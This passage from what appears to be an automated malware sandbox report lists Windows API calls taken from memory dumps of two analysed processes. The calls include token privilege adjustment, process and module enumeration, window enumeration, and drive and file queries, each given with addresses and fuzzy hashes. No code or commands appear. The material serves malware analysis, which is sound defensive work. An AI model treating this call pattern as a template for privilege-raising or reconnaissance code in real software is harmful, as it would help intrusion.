                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: Flags
                                                    • String ID:
                                                    • API String ID: 3401871038-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02800640
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0280099C
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 006DAB1A
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 006DAA71
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,9CD4697E,00000000,00000000,00000000,00000000), ref: 02800819
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 006DABC9
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 006DBA7E
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 028001D0
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0280109E
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 006DA23E
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0280132F
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 006DBB2F
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: BufferConsoleInfoScreen
                                                    • String ID:
                                                    • API String ID: 3437242342-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02800502
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02800FB0
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 006DA94A
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02800640
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 006DABC9
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02801148
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0280099C
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: Flags
                                                    • String ID:
                                                    • API String ID: 3401871038-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 006DAA71
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 006DA9C8
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 006DA9C8
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184631089.0000000002900000.00000040.00000040.sdmp, Offset: 02900000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184631089.0000000002900000.00000040.00000040.sdmp, Offset: 02900000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2185361965.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176774167.00000000006D2000.00000040.00000001.sdmp, Offset: 006D2000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7f9cd7b3587bf29d96b8f8e682d932e51daf42074fcc41cb751aa0c932c8301f
                                                    • Instruction ID: a4931693364e540622fd56480fcdefee8c5ede4495f3df904074594ab14ba88f
                                                    • Opcode Fuzzy Hash: 7f9cd7b3587bf29d96b8f8e682d932e51daf42074fcc41cb751aa0c932c8301f
                                                    • Instruction Fuzzy Hash: C8D05E79605A828FD7178A1CC1A4B9537D5AF65B04F4644FAEC40CB7A3C768E9D1D200
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176774167.00000000006D2000.00000040.00000001.sdmp, Offset: 006D2000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b5cdfdca58a9b0b4faa012c529437d9bec6a451b338b5a150c33ee7596b6b5a5
                                                    • Instruction ID: e5ed1be13f3de15aa434b93eb11df458cf0539a1112551d2458355c124e841e6
                                                    • Opcode Fuzzy Hash: b5cdfdca58a9b0b4faa012c529437d9bec6a451b338b5a150c33ee7596b6b5a5
                                                    • Instruction Fuzzy Hash: 77D05E347006828FDB15CA1CC1A4F9973E5AF90700F0644E9BC008B366C3A8EC80C600
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Executed Functions

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0067AD37
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0067AD37
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0067B329
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0067B329
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 029B01D0
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 029B072D
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 029B0DD6
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,9C2A452C,00000000,00000000,00000000,00000000), ref: 0067AFBE
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,9C2A452C,00000000,00000000,00000000,00000000), ref: 0067BDBC
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 029B109E
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,9C2A452C,00000000,00000000,00000000,00000000), ref: 0067B0AE
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • EnumWindows.USER32(?,00000E9C,?,?), ref: 0067A23E
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumWindows
                                                    • String ID:
                                                    • API String ID: 1129996299-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,9C2A452C,00000000,00000000,00000000,00000000), ref: 029B0819
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 029B0502
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 029B072D
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,9C2A452C,00000000,00000000,00000000,00000000), ref: 029B08E5
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0067A94A
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 029B0DD6
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,9C2A452C,00000000,00000000,00000000,00000000), ref: 0067BDBC
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 029B0FB0
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,9C2A452C,00000000,00000000,00000000,00000000), ref: 0067B0AE
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0067AB1A
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 0067BB2F
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: BufferConsoleInfoScreen
                                                    • String ID:
                                                    • API String ID: 3437242342-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 029B1148
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,9C2A452C,00000000,00000000,00000000,00000000), ref: 0067AFBE
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,9C2A452C,00000000,00000000,00000000,00000000), ref: 029B08E5
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0067BA7E
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 029B132F
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 0067A39C
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 029B0640
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 029B099C
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0067AB1A
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 0067AA71
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,9C2A452C,00000000,00000000,00000000,00000000), ref: 029B0819
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 0067ABC9
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0067BA7E
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 029B01D0
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 029B109E
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • EnumWindows.USER32(?,00000E9C,?,?), ref: 0067A23E
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumWindows
                                                    • String ID:
                                                    • API String ID: 1129996299-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 029B132F
                                                    Memory Dump Source
